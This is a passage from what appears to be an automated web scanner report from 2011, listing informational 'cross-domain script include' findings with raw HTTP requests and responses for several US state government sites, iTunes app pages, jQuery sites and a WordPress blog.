<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><!-- Instan
...[SNIP]...
<!-- END 9/23/10 -->


<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...

20.38. http://in.gov/core/index_pages/void()  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/index_pages/void()

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /core/index_pages/void() HTTP/1.1
Host: in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304127024028:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerapps_ii_oss=4046653450.36895.0000; __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 12:21:07 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:22:07 GMT; path=/
Content-Length: 191344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<me
...[SNIP]...
<!-- END 9/23/10 -->


<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...

20.39. http://in.gov/core/js/arss.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/js/arss.css

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /core/js/arss.css HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 01:33:22 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:34:22 GMT; path=/
Content-Length: 191344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<me
...[SNIP]...
<!-- END 9/23/10 -->


<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...

20.40. http://in.gov/core/online_services.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/online_services.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /core/online_services.html HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304126855900:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.1.10.1304126856

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:29:55 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1865746442.20480.0000; expires=Sat, 30-Apr-2011 01:30:55 GMT; path=/
Content-Length: 32871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><!-- Insta
...[SNIP]...
</script>
<script src="http://code.jquery.com/jquery-latest.js"></script>
...[SNIP]...
<!-- END 9/23/10 -->


<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...

20.41. http://in.gov/gov/photo.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /gov/photo.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /gov/photo.htm HTTP/1.1
Host: in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304127024028:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerapps_ii_oss=4046653450.36895.0000; __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:21:09 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:22:09 GMT; path=/
Content-Length: 61001

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><!-- PageID 2397 - pub
...[SNIP]...
<div id="scontainer">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

20.42. http://in.gov/sos/securities/2521.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /sos/securities/2521.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sos/securities/2521.htm HTTP/1.1
Host: in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304127024028:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerapps_ii_oss=4046653450.36895.0000; __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:21:12 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:22:12 GMT; path=/
Content-Length: 27940

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><!-- PageID 2423 - pub
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

20.43. http://in.gov/spd/2333.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /spd/2333.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /spd/2333.htm HTTP/1.1
Host: in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304127024028:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerapps_ii_oss=4046653450.36895.0000; __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:21:15 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:22:15 GMT; path=/
Content-Length: 25587

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><!-- PageID 2333 - pub
...[SNIP]...
<div id="scontainer">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

20.44. http://in.gov/void()  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /void()

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /void() HTTP/1.1
Host: in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304127024028:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerapps_ii_oss=4046653450.36895.0000; __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 12:21:20 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:22:20 GMT; path=/
Content-Length: 191344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<me
...[SNIP]...
<!-- END 9/23/10 -->


<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...

20.45. http://itunes.apple.com/app/eyes-and-ears-on-kentucky/id422703420  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /app/eyes-and-ears-on-kentucky/id422703420

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /app/eyes-and-ears-on-kentucky/id422703420 HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 30 Apr 2011 12:21:05 GMT
x-apple-orig-url-path: /app/eyes-and-ears-on-kentucky/id422703420
x-apple-application-site: ST11
x-apple-max-age: 3600
Content-Type: text/html
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewSoftware?id=422703420
x-apple-application-instance: 2013005
x-apple-aka-ttl: Generated Sat Apr 30 05:21:05 PDT 2011, Expires Sat Apr 30 05:22:05 PDT 2011, TTL 60s
x-webobjects-loadaverage: 0
Cache-Control: no-transform, max-age=35
Date: Sat, 30 Apr 2011 12:21:27 GMT
Content-Length: 28764
Connection: close
X-Apple-Partner: origin.0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.apple.com/itms/" lang="en">


<head>

<meta http-equiv="Content-Type" conten
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://r.mzstatic.com/htmlResources/101B/web-storefront-preview.cssz" />


<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/101B/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/101B/web-storefront-preview.jsz"></script>
...[SNIP]...

20.46. http://itunes.apple.com/us/app/indiana-dnr/id395591679  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /us/app/indiana-dnr/id395591679

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/app/indiana-dnr/id395591679 HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 30 Apr 2011 12:21:05 GMT
x-apple-orig-url-path: /us/app/indiana-dnr/id395591679
x-apple-application-site: NWK
x-apple-max-age: 3600
Content-Type: text/html
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewSoftware?id=395591679&cc=us
x-apple-application-instance: 11017
x-apple-aka-ttl: Generated Sat Apr 30 05:21:05 PDT 2011, Expires Sat Apr 30 05:22:05 PDT 2011, TTL 60s
x-webobjects-loadaverage: 0
Cache-Control: no-transform, max-age=38
Date: Sat, 30 Apr 2011 12:21:27 GMT
Content-Length: 31911
Connection: close
X-Apple-Partner: origin.0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.apple.com/itms/" lang="en">


<head>

<meta http-equiv="Content-Type" conten
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://r.mzstatic.com/htmlResources/101B/web-storefront-preview.cssz" />


<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/101B/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/101B/web-storefront-preview.jsz"></script>
...[SNIP]...

20.47. http://itunes.apple.com/us/app/netflix/id363590051  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /us/app/netflix/id363590051

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/app/netflix/id363590051 HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 30 Apr 2011 12:21:06 GMT
x-apple-orig-url-path: /us/app/netflix/id363590051
x-apple-application-site: NWK
x-apple-max-age: 3600
Content-Type: text/html
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewSoftware?id=363590051&cc=us
x-apple-application-instance: 11049
x-apple-aka-ttl: Generated Sat Apr 30 05:21:06 PDT 2011, Expires Sat Apr 30 05:22:06 PDT 2011, TTL 60s
x-webobjects-loadaverage: 0
Cache-Control: no-transform, max-age=37
Date: Sat, 30 Apr 2011 12:21:28 GMT
Content-Length: 22414
Connection: close
X-Apple-Partner: origin.0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.apple.com/itms/" lang="en">


<head>

<meta http-equiv="Content-Type" conten
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://r.mzstatic.com/htmlResources/101B/web-storefront-preview.cssz" />


<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/101B/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/101B/web-storefront-preview.jsz"></script>
...[SNIP]...

20.48. http://itunes.apple.com/us/app/ri-gov/id374968524  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /us/app/ri-gov/id374968524

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/app/ri-gov/id374968524 HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 30 Apr 2011 12:21:06 GMT
x-apple-orig-url-path: /us/app/ri-gov/id374968524
x-apple-application-site: NWK
x-apple-max-age: 3600
Content-Type: text/html
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewSoftware?id=374968524&cc=us
x-apple-application-instance: 16005
x-apple-aka-ttl: Generated Sat Apr 30 05:21:06 PDT 2011, Expires Sat Apr 30 05:22:06 PDT 2011, TTL 60s
x-webobjects-loadaverage: 0
Cache-Control: no-transform, max-age=31
Date: Sat, 30 Apr 2011 12:21:30 GMT
Content-Length: 27874
Connection: close
X-Apple-Partner: origin.0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.apple.com/itms/" lang="en">


<head>

<meta http-equiv="Content-Type" conten
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://r.mzstatic.com/htmlResources/101B/web-storefront-preview.cssz" />


<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/101B/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/101B/web-storefront-preview.jsz"></script>
...[SNIP]...

20.49. http://johncarney.house.gov/press-release/rep-carney-statement-budget-agreement  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://johncarney.house.gov
Path:   /press-release/rep-carney-statement-budget-agreement

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press-release/rep-carney-statement-budget-agreement HTTP/1.1
Host: johncarney.house.gov
Proxy-Connection: keep-alive
Referer: http://johncarney.house.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 30 Apr 2011 00:42:57 +0000
ETag: "1304124177"
Link: </node/257>; rel="shortlink",</press-release/rep-carney-statement-budget-agreement>; rel="canonical"
X-Generator: Drupal 7 (http://drupal.org)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 30 Apr 2011 00:42:58 GMT
Date: Sat, 30 Apr 2011 00:42:58 GMT
Connection: close
Content-Length: 32492

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" version="XHTML+RDFa 1.0" dir="ltr"

...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4cdc6bb46f89d3f7"></script>
...[SNIP]...

20.50. http://jquery.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jquery.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 21:19:09 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 31 Mar 2011 20:44:18 GMT
ETag: "49602b8-3eb2-5b6fac80"
Accept-Ranges: bytes
Content-Length: 16050
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <html>
   <head>
       <meta http-equiv="content-type" content="text/html; charset=utf-8" />
       <title>jQuery: The Write Less, Do More, JavaScript Library</title>
       <link rel="stylesheet" hr
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/files/rocker/css/screen.css" type="text/css" />
       <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

20.51. http://jqueryui.com/themeroller/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /themeroller/ HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 30 Apr 2011 12:21:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 117009

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
           <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.12/jquery-ui.min.js" type="text/javascript"></script>
           <script src="http://static.jquery.com/ui/themeroller/scripts/app.js" type="text/javascript"></script>
...[SNIP]...

20.52. http://kentucky.gov/Pages/home.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kentucky.gov
Path:   /Pages/home.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Pages/home.aspx HTTP/1.1
Host: kentucky.gov
Proxy-Connection: keep-alive
Referer: http://ky.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 68003
Content-Type: text/html; charset=utf-8
Expires: Fri, 15 Apr 2011 00:36:54 GMT
Last-Modified: Sat, 30 Apr 2011 00:36:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6514
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Sat, 30 Apr 2011 00:36:56 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>


<head>
<meta name="google-site-verification" content="jx4_Kw472kwHw4afCUuQl
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/style library/ky_portal_print.css" media="print" />


   <script src="https://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</script>
   <script src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...

20.53. http://kentucky.gov/feedback.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kentucky.gov
Path:   /feedback.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /feedback.aspx?source=/feedbackThanks.aspx HTTP/1.1
Host: kentucky.gov
Proxy-Connection: keep-alive
Referer: http://kentucky.gov/Pages/home.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210812687.1304123849.1.1.utmcsr=ky.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=210812687.1043360039.1304123849.1304123849.1304123849.1; __utmc=210812687; __utmb=210812687.1.10.1304123849

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 20264
Content-Type: text/html; charset=utf-8
Expires: Fri, 15 Apr 2011 00:37:14 GMT
Last-Modified: Sat, 30 Apr 2011 00:37:14 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6514
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nwf2tqnh55jvn555govocc2q; path=/; HttpOnly
Date: Sat, 30 Apr 2011 00:37:14 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html dir="ltr">

<head><meta name="ProgId" content="ShareP
...[SNIP]...
</style>

<script src="https://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

20.54. http://la.gov/includes/banner/emergencybanner.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://la.gov
Path:   /includes/banner/emergencybanner.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /includes/banner/emergencybanner.js HTTP/1.1
Host: la.gov
Proxy-Connection: keep-alive
Referer: http://la.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:22:09 GMT
Server: Apache
Last-Modified: Thu, 17 Mar 2011 14:15:19 GMT
ETag: "2febd-871-49eae4a8b8bc0"
Accept-Ranges: bytes
Content-Length: 2161
Content-Type: text/x-js

var bannerImageSource = ""; /* Absolute URL of the banner image */
var bannerAltText = "emergency.louisiana.gov - Providing important information for families across the state regarding preparation an
...[SNIP]...
</table>');

document.write('<script type="text/javascript" src="http://emergency.louisiana.gov/EmergencyNews.js"></script>
...[SNIP]...

20.55. http://licensingexpress.wordpress.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://licensingexpress.wordpress.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: licensingexpress.wordpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 30 Apr 2011 12:22:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://licensingexpress.wordpress.com/xmlrpc.php
Link: <http://wp.me/wwGt>; rel=shortlink
Content-Length: 39507

<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
<meta charset="UTF-8" />
<title> Licensing Express</title>
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="stylesheet" href="http://s2
...[SNIP]...
<link rel='stylesheet' id='sharedaddy-css' href='http://s1.wp.com/wp-content/mu-plugins/sharing/sharing.css?m=1302985789g&#038;ver=MU' type='text/css' media='all' />
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/l10n.js?m=1302985786g&amp;ver=20101110'></script>
<script type='text/javascript' src='http://s2.wp.com/wp-includes/js/jquery/jquery.js?m=1302985786g&amp;ver=1.4.4'></script>
...[SNIP]...
</div><script src="http://widgets.vodpod.com/javascripts/recent_videos.js?id=527710&amp;options[theme]=sidebar2&amp;tag_id=latest&amp;title=Time-saving+tips&amp;"></script>
...[SNIP]...
</script>
<script src="http://widgets.vodpod.com/javascripts/widgets/dynamic_gallery.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</noscript>
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?v&#038;ver=MU'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1302985790g&amp;ver=MU'></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...

20.56. http://mi.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mi.gov
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: mi.gov
Proxy-Connection: keep-alive
